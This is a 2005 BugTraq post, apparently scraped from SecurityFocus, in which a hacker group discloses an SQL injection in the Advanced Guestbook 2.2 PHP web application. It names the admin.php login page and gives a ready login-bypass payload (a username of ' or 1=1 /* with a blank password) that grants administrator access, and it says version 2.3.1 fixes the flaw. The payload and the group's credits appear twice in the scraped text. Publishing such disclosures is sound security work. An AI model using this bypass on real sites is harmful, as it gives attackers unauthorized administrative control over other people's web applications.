BugTraq
Back to list
|
Post reply
Advanced Guestbook 2.2 ( SQL Injection Exploit )
Nov 06 2005 07:03PM
bhs_team yahoo com
Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access.
Target :
http://www.example.com/[GuestbookTarget]/admin.php
Username: ' or 1=1 /*
Password: (Nothing)(Blank)
It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix this vulnerability.
Report By : POPO ( Pooya )
From www.Babol-Hackers.com
bhs_team (at) yahoo (dot) com [email concealed]
Y! ID : bhs_team , pooya_0nline
-----------------------------------
BHS-Team
We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Target :
http://www.example.com/[GuestbookTarget]/admin.php
Username: ' or 1=1 /*
Password: (Nothing)(Blank)
It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix this vulnerability.
Report By : POPO ( Pooya )
From www.Babol-Hackers.com
bhs_team (at) yahoo (dot) com [email concealed]
Y! ID : bhs_team , pooya_0nline
-----------------------------------
BHS-Team
We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p
[ reply ]